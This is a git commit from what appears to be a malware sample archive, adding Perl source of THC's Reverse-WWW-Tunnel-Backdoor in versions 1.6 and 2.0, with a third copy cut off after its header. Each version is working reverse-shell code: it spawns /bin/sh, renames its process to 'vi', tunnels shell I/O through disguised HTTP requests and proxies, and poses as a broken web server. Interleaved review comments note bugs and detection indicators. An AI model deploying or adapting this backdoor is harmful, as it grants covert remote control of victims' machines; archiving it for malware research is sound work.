Add files via upload

This commit is contained in:
vxunderground 2020-10-09 21:59:39 -05:00 committed by GitHub
parent a5fc35f165
commit 06828a0956
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
87 changed files with 32994 additions and 0 deletions

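--- /dev/null
+++ b/Perl/Backdoor.Perl.AEI.16
@@ -0,0 +1,338 @@
+#
+# Reverse-WWW-Tunnel-Backdoor v1.6
+# (c) 1998 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
+# Check out http://r3wt.base.org for updates
+# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls"
+# available at the website above in the "Articles" section.
+#
+# Greets to all THC, ADM, arF and #bluebox guys
+# verified to work on Linux, Solaris, AIX and OpenBSD
+# BUGS: some Solaris machines: select(3) is broken, won't work there
+# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ...
+# we can't make proper receive checks here. Workaround implemented.
+#
+# HISTORY:
+# v1.6: included www-proxy authentication ;-))
+# v1.4: porting to various unix types (and I thought perl'd be portable...)
+# v1.3: initial public release of the paper including this tool
+#
+# GENERAL CONFIG (except for $MASK, everything must be the same
+# for MASTER and SLAVE is this section!)
+#
+$CGI_PREFIX="/cgi-bin/order?"; # should look like cgi. "?" as last char!
+$MASK="vi"; # for masking the program's process name
+$PASSWORD="THC"; # anything, nothing you have to rememeber
+# (not a real "password" anyway)
+#
+# MASTER CONFIG (specific for the MASTER)
+#
+$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080)
+$SERVER="127.0.0.1"; # the host to run on (ip/dns) (the SLAVE needs this!)
+#
+# SLAVE CONFIG (specific for the SLAVE)
+#
+$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh)
+$DELAY="3"; # time to wait for output after your command(s)
+#$TIME="00:01"; # time when to connect to the master (unset if now)
+#$DAILY="yes"; # tries to connect once daily if set with something
+#$PROXY="127.0.0.1"; # set this with the Proxy if you must use one
+#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one
+#$PROXY_USER="user"; # username for proxy authentication
+#$PROXY_PASSWORD="pass"; # password for proxy authentication
+#$DEBUG=""; # for debugging purpose, turn off when in production
+$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris
+# END OF CONFIG # nothing for you to do after this point #
+################## BEGIN MAIN CODE ##################
+require 5.002;
+use Socket;
+$|=1; # next line changes our process name
+if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; }
+undef $DAILY if (! $TIME);
+if ( !($PROXY) || !($PROXY_PORT) ) {
+undef $PROXY;
+undef $PROXY_PORT;
+}
+$protocol = getprotobyname('tcp');
+if ($ARGV[0] ne "") {
+if ($ARGV[0] eq "-h") {
+print STDOUT "no commandline option : daemon mode\n";
+print STDOUT "using \"-h\" as option : this help\n";
+print STDOUT "any other option : slave mode\n";
+exit(0);
+} else {
+print STDOUT "starting in slave mode\n";
+$SLAVE_MODE = "yeah";
+}
+}
+if (! $SLAVE_MODE) {
+&master;
+} else {
+&slave;
+}
+# END OF MAIN FUNCTION
+############### SLAVE FUNCTION ###############
+sub slave {
+$pid = 0;
+if ($PROXY) { # setting the real config (for Proxy Support)
+$REAL_SERVER = $PROXY;
+$REAL_PORT = $PROXY_PORT;
+$REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT
+. $CGI_PREFIX;
+$PROXY_SUFFIX = "Pragma: no-cache\n";
+if ( $PROXY_USER && USER_PASSWORD ) {
+&base64encoding;
+$PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE;
+}
+} else {
+$REAL_SERVER = $SERVER;
+$REAL_PORT = $LISTEN_PORT;
+$REAL_PREFIX = "GET " . $CGI_PREFIX;
+}
+AGAIN: if ($pid) { kill 9, $pid; }
+if ($TIME) { # wait until the specified $TIME
+$TIME =~ s/^0//; $TIME =~ s/:0/:/;
+(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
+= localtime(time);
+$t=$hour . ":" . $min;
+while ($TIME ne $t) {
+sleep(28); # every 28 seconds we look at the watch
+(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
+= localtime(time);
+$t=$hour . ":" .$min;
+}
+}
+print STDERR "Slave activated\n" if $DEBUG;
+if ($DAILY) { # if we must connect daily, we'll
+if (fork) { # fork the daily shell process to
+sleep(69); # ensure the master control process
+goto AGAIN; # won't get stuck by a fucking cmd
+} # the user executed.
+print STDERR "forked\n" if $DEBUG;
+}
+$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
+$remote = sockaddr_in($REAL_PORT, $address);
+$forked = 0;
+GO: close(THC);
+socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
+or die "can't create socket\n";
+setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
+if (! $forked) { # fork failed? fuck, let's try again
+pipe R_IN, W_IN; select W_IN; $|=1;
+pipe R_OUT, W_OUT; select W_OUT; $|=1;
+$pid = fork;
+if (! defined $pid) {
+close THC;
+close R_IN; close W_IN;
+close R_OUT; close W_OUT;
+goto GO;
+}
+$forked = 1;
+}
+if (! $pid) { # this is the child process (execs $SHELL)
+close R_OUT; close W_IN; close THC;
+print STDERR "forking $SHELL in child\n" if $DEBUG;
+open STDIN, "<&R_IN";
+open STDOUT, ">&W_OUT";
+open STDERR, ">&W_OUT";
+exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
+close R_IN; close W_OUT;
+exit(0);
+} else { # this is the parent (data control + network)
+close R_IN;
+sleep($DELAY); # we wait $DELAY for the commands to complete
+vec($rs, fileno(R_OUT), 1) = 1;
+print STDERR "before: allwritten2stdin\n" if $DEBUG;
+select($r = $rs, undef, undef, 30);
+print STDERR "after : wait for allwritten2stdin\n" if $DEBUG;
+sleep(1); # The following readin of the command output
+$output = ""; # looks weird. It must be! every system
+vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-((
+print STDERR "before: readwhiledatafromstdout\n" if $DEBUG;
+while (select($w = $ws, undef, undef, 1)) {
+read R_OUT, $readout, 1 || last;
+$output = $output . $readout;
+}
+print STDERR "after : readwhiledatafromstdout\n" if $DEBUG;
+print STDERR "before: fucksunprob\n" if $DEBUG;
+vec($ws, fileno(W_OUT), 1) = 1;
+while (! select(undef, $w=$ws, undef, 0.001)) {
+read R_OUT, $readout, 1 || last;
+$output = $output . $readout;
+}
+print STDERR "after : fucksunprob\n" if $DEBUG;
+print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG;
+print W_OUT "\000" || goto ENDE;
+print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG;
+while (1) {
+read R_OUT, $readout, 1 || last;
+last if ($readout eq "\000");
+$output = $output . $readout;
+}
+print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG;
+&uuencode; # does the encoding of the shell output
+$encoded = $REAL_PREFIX . $encoded;
+$encoded = $encoded . $PROXY_SUFFIX if ($PROXY);
+$encoded = $encoded . "\n";
+print STDERR "connecting to remote, fail->exit\n" if $DEBUG;
+connect(THC, $remote) || goto ENDE; # connect to master
+print STDERR "send encoded data, fail->exit\n" if $DEBUG;
+send (THC, $encoded, 0) || goto ENDE; # and send data
+$input = "";
+vec($rt, fileno(THC), 1) = 1; # wait until master sends reply
+print STDERR "before: wait4answerfromremote\n" if $DEBUG;
+while (! select($r = $rt, undef, undef, 0.00001)) {}
+print STDERR "after : wait4answerfromremote\n" if $DEBUG;
+print STDERR "read data from socket until eod\n" if $DEBUG;
+$error="no";
+while (1) { # read until EOD (End Of Data)
+print STDERR "?" if $DEBUG;
+# OpenBSD 2.2 can't recv here! can't get any data! sucks ...
+recv (THC, $readin, 1, 0) || undef $error;
+if ((! $error) and (! $BROKEN_RECV)) { goto OK; }
+print STDERR "!" if $DEBUG;
+goto OK if (($readin eq "\000") or ($readin eq "\n")
+or ($readin eq ""));
+$input = $input . $readin;
+}
+OK: print STDERR "\nall data read, entering OK\n" if $DEBUG;
+$input =~ s/\n//gs;
+&uudecode; # decoding the data from the master
+print STDERR "if password not found -> exit\n" if $DEBUG;
+goto ENDE if ( $decoded =~ m/^$PASSWORD/s == 0);
+$decoded =~ s/^$PASSWORD//;
+print STDERR "writing input data to $SHELL\n" if $DEBUG;
+print W_IN "$decoded" || goto ENDE; # sending the data
+sleep(1); # to the shell proc.
+print STDERR "jumping to GO\n" if $DEBUG;
+goto GO;
+}
+ENDE: kill 9, $pid; $pid = 0;
+exit(0);
+} # END OF SLAVE FUNCTION
+############### MASTER FUNCTION ###############
+sub master {
+socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
+or die "can't create socket\n";
+setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
+listen(THC, 3) || die "can't listen\n"; # print the HELP
+print STDOUT '
+Welcome to the Reverse-WWW-Tunnel-Backdoor v1.6 by van Hauser / THC ...
+Introduction: Wait for your SLAVE to connect, examine it\'s output and then
+type in your commands to execute on SLAVE. You\'ll have to
+wait min. the set $DELAY seconds before you get the output
+and can execute the next stuff. Use ";" for multiple commands.
+Trying to execute interactive commands may give you headache
+so beware. Your SLAVE may hang until the daily connect try
+(if set - otherwise you lost).
+You also shouldn\'t try to view binary data too ;-)
+"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
+friends if you don\'t like using vi in a delayed line mode ;-)
+To exit this program on any time without doing harm to either
+MASTER or SLAVE just press Control-C.
+Now have fun.
+';
+YOP: print STDOUT "\nWaiting for connect ...";
+$remote=accept (S, THC) || goto YOP; # get the connection
+($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE
+$slave=gethostbyaddr($r_slave, AF_INET); # data.
+$slave="unresolved" if ($slave eq "");
+print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
+select S; $|=1;
+select STDOUT; $|=1;
+$input = "";
+vec($socks, fileno(S), 1) = 1;
+$error="no";
+while (1) { # read the data sent by the slave
+while (! select($r = $socks, undef, undef, 0.00001)) {}
+recv (S, $readin, 80, 0) || undef $error;
+if ((! $error) and (! $BROKEN_RECV)) {
+print STDOUT "[disconnected]\n";
+}
+$readin =~ s/\r//g;
+$input = $input . $readin;
+last if ( $input =~ m/\n\n/s );
+}
+&hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 );
+$input =~ s/^.*($CGI_PREFIX)\??//s;
+$input =~ s/\n.*$//s;
+&uudecode; # decoding the data from the slave
+&hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 );
+$decoded =~ s/^$PASSWORD//s;
+$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
+print STDOUT "$decoded"; # showing the slave output to the user
+$output = <STDIN>; # and get his input.
+&uuencode; # encode the data for the slave
+send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it
+close (S);
+print STDOUT "sent.\n";
+goto YOP; # wait for the next connect from the slave
+} # END OF MASTER FUNCTION
+###################### MISC. FUNCTIONS #####################
+sub uuencode { # does the encoding stuff for error-free data transfer via WWW
+$output = $PASSWORD . $output; # PW is for error checking and
+$uuencoded = pack "u", "$output"; # preventing sysadmins from
+$uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird
+/'zcadefghjklmnopqrstuv' # data. No real
+/; # security!
+$uuencoded =~ tr/"'"/'b'/;
+if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb
+$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
+$cut_length = 4099 - (length $REAL_PREFIX);
+$uuencoded = pack "a$cut_length", $uuencoded
+if ($codelength > 4111);
+}
+$encoded = $uuencoded;
+$encoded = $encoded . " HTTP/1.0\n" if ($SLAVE_MODE);
+} # END OF UUENCODE FUNCTION
+sub uudecode { # does the decoding of the data stream
+$input =~ tr/'zcadefghjklmnopqrstuv'
+/'\n)=(:;&><,#$*%]!\@"`\\\-'
+/;
+$input =~ tr/'b'/"'"/;
+$decoded = unpack "u", "$input";
+} # END OF UUDECODE FUNCTION
+sub base64encoding { # does the base64 encoding for proxy passwords
+$encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD;
+$encoded_string = substr(pack('u', $encode_string), 1);
+chomp($encoded_string);
+$encoded_string =~ tr|` -_|AA-Za-z0-9+/|;
+$padding = (3 - length($encode_string) % 3) % 3;
+$encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding;
+$PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n";
+} # END OF BASE64ENCODING FUNCTION
+sub hide_as_broken_webserver { # invalid request -> look like broken server
+send (S, "<HTML><HEAD>\n<TITLE>404 File Not Found</TITLE>\n</HEAD>".
+"<BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n", 0);
+close S;
+print STDOUT "Warning! Illegal server access!\n"; # report to user
+goto YOP;
+} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION
+# END OF PROGRAM # (c) 1998 by <vh@reptile.rug.ac.be>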
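Review bot: `if ( $PROXY_USER && USER_PASSWORD )` in `slave` tests the bareword `USER_PASSWORD`, not `$PROXY_PASSWORD`; this file never enables `use strict`, so the bareword is simply a true string and the proxy-auth branch is entered whenever `$PROXY_USER` alone is set. The identical line is in Perl/Backdoor.Perl.AEI.20 and Perl/Backdoor.Perl.AEI.a. The fallbacks on `read R_OUT, $readout, 1 || last;` and `print W_OUT "\000" || goto ENDE;` are likewise inert, because `||` binds to the last argument rather than to the call's return value, which is the classic precedence mistake `use warnings` would report. For an archived sample I would not patch any of this but record it in a header comment, e.g. `# archive note: verbatim 1998 PoC; no strict/warnings, so the USER_PASSWORD bareword and the || fallbacks are inert as written`, and list the static artefacts a detection engineer can key on in that same comment: `$CGI_PREFIX`, the `$PASSWORD` prefix prepended to every uuencoded body in `uuencode`, and the NUL-padded `$0` rename to `vi`.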

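--- /dev/null
+++ b/Perl/Backdoor.Perl.AEI.20
@@ -0,0 +1,366 @@
+#
+# Reverse-WWW-Tunnel-Backdoor v2.0
+# (c) 1998-2002 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
+# Check out http://www.thehackerschoice.com
+# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls"
+# available at the website above in the "Articles" section.
+#
+# Greets to all THC, TESO, ADM and #bluebox guys
+# verified to work on Linux, Solaris, AIX and OpenBSD
+# BUGS: some Solaris machines: select(3) is broken, won't work there
+# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ...
+# we can't make proper receive checks here. Workaround implemented.
+#
+# HISTORY:
+# v2.0: HTTP 1.0 protocol compliance (finally ;-)
+# v1.6: included www-proxy authentication ;-))
+# v1.4: porting to various unix types (and I thought perl'd be portable...)
+# v1.3: initial public release of the paper including this tool
+#
+# GENERAL CONFIG (except for $MASK, everything must be the same
+# for MASTER and SLAVE is this section!)
+#
+$MODE="POST"; # GET or POST
+$CGI_PREFIX="/cgi-bin/orderform";# should look like a valid cgi.
+$MASK="vi"; # for masking the program's process name
+$PASSWORD="THC"; # anything, nothing you have to rememeber
+# (not a real "password" anyway)
+#
+# MASTER CONFIG (specific for the MASTER)
+#
+$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080)
+$SERVER="127.0.0.1"; # the host to run on (ip/dns) (the SLAVE needs this!)
+#
+# SLAVE CONFIG (specific for the SLAVE)
+#
+$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh)
+$DELAY="3"; # time to wait for output after your command(s)
+#$TIME="14:39"; # time when to connect to the master (unset if now)
+#$DAILY="yes"; # tries to connect once daily if set with something
+#$PROXY="127.0.0.1"; # set this with the Proxy if you must use one
+#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one
+#$PROXY_USER="user"; # username for proxy authentication
+#$PROXY_PASSWORD="pass";# password for proxy authentication
+#$DEBUG="yes"; # for debugging purpose, turn off when in production
+$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris
+# END OF CONFIG # nothing for you to do after this point #
+################## BEGIN MAIN CODE ##################
+require 5.002;
+use Socket;
+$|=1; # next line changes our process name
+if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; }
+undef $DAILY if (! $TIME);
+if ( !($PROXY) || !($PROXY_PORT) ) {
+undef $PROXY;
+undef $PROXY_PORT;
+}
+$protocol = getprotobyname('tcp');
+if ($ARGV[0] ne "slave" && $ARGV[0] ne "daemon" && $ARGV[0] ne "master" && $ARGV[1] eq "") {
+print STDOUT "Proof-of-Concept Program for the paper \"Placing Backdoors through Firewalls\"\navailable at http://www.thehackerschoice.com in the \"Articles\" section.\n";
+print STDOUT "Commandline options for rwwwshell:\n\tmaster\t- master mode\n\tslave\t- slave mode\n";
+exit(0);
+}
+if ($ARGV[0] eq "slave") {
+print STDOUT "starting in slave mode\n";
+$SLAVE_MODE = "yeah";
+}
+# check for a correct mode
+if ($MODE ne "GET" && $MODE ne "POST") {
+print STDOUT "Error: MODE must either be GET or POST, re-edit this perl config\n";
+exit(-1);
+}
+if (! $SLAVE_MODE) {
+&master;
+} else {
+&slave;
+}
+# END OF MAIN FUNCTION
+############### SLAVE FUNCTION ###############
+sub slave {
+$pid = 0;
+$PROXY_SUFFIX = "Host: " . $SERVER . "\r\nUser-Agent: Mozilla/4.0\r\nAccept: text/html, text/plain, image/jpeg, image/*;\r\nAccept-Language: en\r\n";
+if ($PROXY) { # setting the real config (for Proxy Support)
+$REAL_SERVER = $PROXY;
+$REAL_PORT = $PROXY_PORT;
+$REAL_PREFIX = $MODE . " http://" . $SERVER . ":" . $LISTEN_PORT
+. $CGI_PREFIX;
+$PROXY_SUFFIX = $PROXY_SUFFIX . "Pragma: no-cache\r\n";
+if ( $PROXY_USER && USER_PASSWORD ) {
+&base64encoding;
+$PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE;
+}
+} else {
+$REAL_SERVER = $SERVER;
+$REAL_PORT = $LISTEN_PORT;
+$REAL_PREFIX = $MODE . " " . $CGI_PREFIX;
+}
+$REAL_PREFIX = $REAL_PREFIX . "?" if ($MODE eq "GET");
+$REAL_PREFIX = $REAL_PREFIX . " HTTP/1.0\r\n" if ($MODE eq "POST");
+AGAIN: if ($pid) { kill 9, $pid; }
+if ($TIME) { # wait until the specified $TIME
+$TIME =~ s/^0//; $TIME =~ s/:0/:/;
+(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
+= localtime(time);
+$t=$hour . ":" . $min;
+while ($TIME ne $t) {
+sleep(28); # every 28 seconds we look at the watch
+(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
+= localtime(time);
+$t=$hour . ":" .$min;
+}
+}
+print STDERR "Slave activated\n" if $DEBUG;
+if ($DAILY) { # if we must connect daily, we'll
+if (fork) { # fork the daily shell process to
+sleep(69); # ensure the master control process
+goto AGAIN; # won't get stuck by a fucking cmd
+} # the user executed.
+print STDERR "forked\n" if $DEBUG;
+}
+$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
+$remote = sockaddr_in($REAL_PORT, $address);
+$forked = 0;
+GO: close(THC);
+socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
+or die "can't create socket\n";
+setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
+if (! $forked) { # fork failed? fuck, let's try again
+pipe R_IN, W_IN; select W_IN; $|=1;
+pipe R_OUT, W_OUT; select W_OUT; $|=1;
+$pid = fork;
+if (! defined $pid) {
+close THC;
+close R_IN; close W_IN;
+close R_OUT; close W_OUT;
+goto GO;
+}
+$forked = 1;
+}
+if (! $pid) { # this is the child process (execs $SHELL)
+close R_OUT; close W_IN; close THC;
+print STDERR "forking $SHELL in child\n" if $DEBUG;
+open STDIN, "<&R_IN";
+open STDOUT, ">&W_OUT";
+open STDERR, ">&W_OUT";
+exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
+close R_IN; close W_OUT;
+exit(0);
+} else { # this is the parent (data control + network)
+close R_IN;
+sleep($DELAY); # we wait $DELAY for the commands to complete
+vec($rs, fileno(R_OUT), 1) = 1;
+print STDERR "before: allwritten2stdin\n" if $DEBUG;
+select($r = $rs, undef, undef, 30);
+print STDERR "after : wait for allwritten2stdin\n" if $DEBUG;
+sleep(1); # The following readin of the command output
+$output = ""; # looks weird. It must be! every system
+vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-((
+print STDERR "before: readwhiledatafromstdout\n" if $DEBUG;
+while (select($w = $ws, undef, undef, 1)) {
+read R_OUT, $readout, 1 || last;
+$output = $output . $readout;
+}
+print STDERR "after : readwhiledatafromstdout\n" if $DEBUG;
+print STDERR "before: fucksunprob\n" if $DEBUG;
+vec($ws, fileno(W_OUT), 1) = 1;
+while (! select(undef, $w=$ws, undef, 0.001)) {
+read R_OUT, $readout, 1 || last;
+$output = $output . $readout;
+}
+print STDERR "after : fucksunprob\n" if $DEBUG;
+print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG;
+print W_OUT "\000" || goto END_IT;
+print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG;
+while (1) {
+read R_OUT, $readout, 1 || last;
+last if ($readout eq "\000");
+$output = $output . $readout;
+}
+print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG;
+&uuencode; # does the encoding of the shell output
+if ($MODE eq "GET") {
+$encoded = $REAL_PREFIX . $encoded . " HTTP/1.0\r\n";
+$encoded = $encoded . $PROXY_SUFFIX;
+$encoded = $encoded . "\r\n";
+} else { # $MODE is "POST"
+$encoded = $REAL_PREFIX . $PROXY_SUFFIX
+. "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
+. $encoded . "\r\n";
+}
+print STDERR "connecting to remote, fail->exit\n" if $DEBUG;
+connect(THC, $remote) || goto END_IT; # connect to master
+print STDERR "send encoded data, fail->exit\n" if $DEBUG;
+send (THC, $encoded, 0) || goto END_IT; # and send data
+$input = "";
+vec($rt, fileno(THC), 1) = 1; # wait until master sends reply
+print STDERR "before: wait4answerfromremote\n" if $DEBUG;
+while (! select($r = $rt, undef, undef, 0.00001)) {}
+print STDERR "after : wait4answerfromremote\n" if $DEBUG;
+print STDERR "read data from socket until eod\n" if $DEBUG;
+$error="no";
+# while (1) { # read until EOD (End Of Data)
+print STDERR "?" if $DEBUG;
+# OpenBSD 2.2 can't recv here! can't get any data! sucks ...
+recv (THC, $readin, 16386, 0) || undef $error;
+# if ((! $error) and (! $BROKEN_RECV)) { goto OK; }
+print STDERR "!" if $DEBUG;
+goto OK if (($readin eq "\000") or ($readin eq "\n")
+or ($readin eq ""));
+$input = $input . $readin;
+# }
+OK: print STDERR "\nall data read, entering OK\n" if $DEBUG;
+print STDERR "RECEIVE: $input\n" if $DEBUG;
+$input =~ s/.*\r\n\r\n//s;
+print STDERR "BEFORE DECODING: $input\n" if $DEBUG;
+&uudecode; # decoding the data from the master
+print STDERR "AFTER DECODING: $decoded\n" if $DEBUG;
+print STDERR "if password not found -> exit\n" if $DEBUG;
+goto END_IT if ($decoded =~ m/^$PASSWORD/s == 0);
+$decoded =~ s/^$PASSWORD//;
+print STDERR "writing input data to $SHELL\n" if $DEBUG;
+print W_IN "$decoded" || goto END_IT; # sending the data
+sleep(1); # to the shell proc.
+print STDERR "jumping to GO\n" if $DEBUG;
+goto GO;
+}
+END_IT: kill 9, $pid; $pid = 0;
+exit(0);
+} # END OF SLAVE FUNCTION
+############### MASTER FUNCTION ###############
+sub master {
+socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
+or die "can't create socket\n";
+setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
+listen(THC, 3) || die "can't listen\n"; # print the HELP
+print STDOUT '
+Welcome to the Reverse-WWW-Tunnel-Backdoor v2.0 by van Hauser / THC ...
+Introduction: Wait for your SLAVE to connect, examine it\'s output and then
+type in your commands to execute on SLAVE. You\'ll have to
+wait min. the set $DELAY seconds before you get the output
+and can execute the next stuff. Use ";" for multiple commands.
+Trying to execute interactive commands may give you headache
+so beware. Your SLAVE may hang until the daily connect try
+(if set - otherwise you lost).
+You also shouldn\'t try to view binary data too ;-)
+"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
+friends if you don\'t like using vi in a delayed line mode ;-)
+To exit this program on any time without doing harm to either
+MASTER or SLAVE just press Control-C.
+Now have fun.
+';
+YOP: print STDOUT "\nWaiting for connect ...";
+$remote=accept (S, THC) || goto YOP; # get the connection
+($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE
+$slave=gethostbyaddr($r_slave, AF_INET); # data.
+$slave="unresolved" if ($slave eq "");
+print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
+select S; $|=1;
+select STDOUT; $|=1;
+$input = "";
+vec($socks, fileno(S), 1) = 1;
+$error="no";
+# while (1) { # read the data sent by the slave
+while (! select($r = $socks, undef, undef, 0.00001)) {}
+recv (S, $readin, 16386, 0) || undef $error;
+if ((! $error) and (! $BROKEN_RECV)) {
+print STDOUT "[disconnected]\n";
+}
+# $readin =~ s/\r//g;
+# $input = $input . $readin;
+# last if ( $input =~ m/\r\n\r\n/s );
+$input = $readin;
+print STDERR "MASTER RECEIVE: $input\n" if $DEBUG;
+# }
+&hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 );
+if ( $input =~ m/^GET /s ) {
+$input =~ s/^.*($CGI_PREFIX)\??//s;
+$input =~ s/\r\n.*$//s;
+} else { if ( $input =~ m/^POST /s ) {
+$input =~ s/^.*\r\n\r\n//s;
+} else { if ( $input =~ m/^HEAD /s ) {
+&hide_as_broken_webserver;
+} else {
+close S;
+print STDOUT "Warning! Illegal server access!\n"; # report to user
+goto YOP;
+} } }
+print STDERR "BEFORE DECODING: $input\n" if $DEBUG;
+&uudecode; # decoding the data from the slave
+&hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 );
+$decoded =~ s/^$PASSWORD//s;
+$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
+print STDOUT "$decoded"; # showing the slave output to the user
+$output = <STDIN>; # and get his input.
+&uuencode; # encode the data for the slave
+$encoded = "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/plain\r\n\r\n" . $encoded . "\r\n";
+send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it
+close (S);
+print STDOUT "sent.\n";
+goto YOP; # wait for the next connect from the slave
+} # END OF MASTER FUNCTION
+###################### MISC. FUNCTIONS #####################
+sub uuencode { # does the encoding stuff for error-free data transfer via WWW
+$output = $PASSWORD . $output; # PW is for error checking and
+$uuencoded = pack "u", "$output"; # preventing sysadmins from
+$uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird
+/'zcadefghjklmnopqrstuv' # data. No real
+/; # security!
+$uuencoded =~ tr/"'"/'b'/;
+if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb
+$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
+$cut_length = 4099 - (length $REAL_PREFIX);
+$uuencoded = pack "a$cut_length", $uuencoded
+if ($codelength > 4111);
+}
+$encoded = $uuencoded;
+} # END OF UUENCODE FUNCTION
+sub uudecode { # does the decoding of the data stream
+$input =~ tr/'zcadefghjklmnopqrstuv'
+/'\n)=(:;&><,#$*%]!\@"`\\\-'
+/;
+$input =~ tr/'b'/"'"/;
+$decoded = unpack "u", "$input";
+} # END OF UUDECODE FUNCTION
+sub base64encoding { # does the base64 encoding for proxy passwords
+$encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD;
+$encoded_string = substr(pack('u', $encode_string), 1);
+chomp($encoded_string);
+$encoded_string =~ tr|` -_|AA-Za-z0-9+/|;
+$padding = (3 - length($encode_string) % 3) % 3;
+$encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding;
+$PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n";
+} # END OF BASE64ENCODING FUNCTION
+sub hide_as_broken_webserver { # invalid request -> look like broken server
+send (S, "<HTML><HEAD>\r\n<TITLE>404 File Not Found</TITLE>\r\n</HEAD>".
+"<BODY>\r\n<H1>File Not Found</H1>\r\n</BODY></HTML>\r\n", 0);
+close S;
+print STDOUT "Warning! Illegal server access!\n"; # report to user
+goto YOP;
+} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION
+# END OF PROGRAM # (c) 1998-2002 by <vh@reptile.rug.ac.be>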
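Review bot: The request-method dispatch in `master`, `if ( $input =~ m/^GET /s ) { ... } else { if ( $input =~ m/^POST /s ) { ... } else { if ( $input =~ m/^HEAD /s ) {`, nests three `else { if` levels where `elsif` is the idiom, and its final `else` re-implements the `close S` / warning / `goto YOP` sequence that `hide_as_broken_webserver` already provides. Within this "HTTP 1.0 compliance" revision the `Proxy-authorization` header built in `base64encoding` still ends in `"\n"` while every other header the slave assembles ends in `"\r\n"`, an inconsistency that deserves at least a comment; the loops that previously accumulated partial reads are also left as commented-out code around a single `recv` rather than removed. For defenders the static strings are the useful part of this file: the fixed `User-Agent: Mozilla/4.0`, the `Accept:` header with its trailing `;`, the `$CGI_PREFIX` path, and the master's `HTTP/1.1 200 OK` / `Content-Type: text/plain` reply carrying a uuencoded body rewritten by the `tr` alphabet in `uuencode`. I would add a header comment listing those indicators, e.g. `# archive note: static request/response strings below (User-Agent, Accept, CGI path, 200 OK text/plain reply with remapped uuencode alphabet) are the detection handles for this sample`.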

334
Perl/Backdoor.Perl.AEI.a Normal file

@ -0,0 +1,334 @@
#
# Reverse-WWW-Tunnel-Backdoor v1.6
# (c) 1998 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
# Check out http://r3wt.base.org for updates
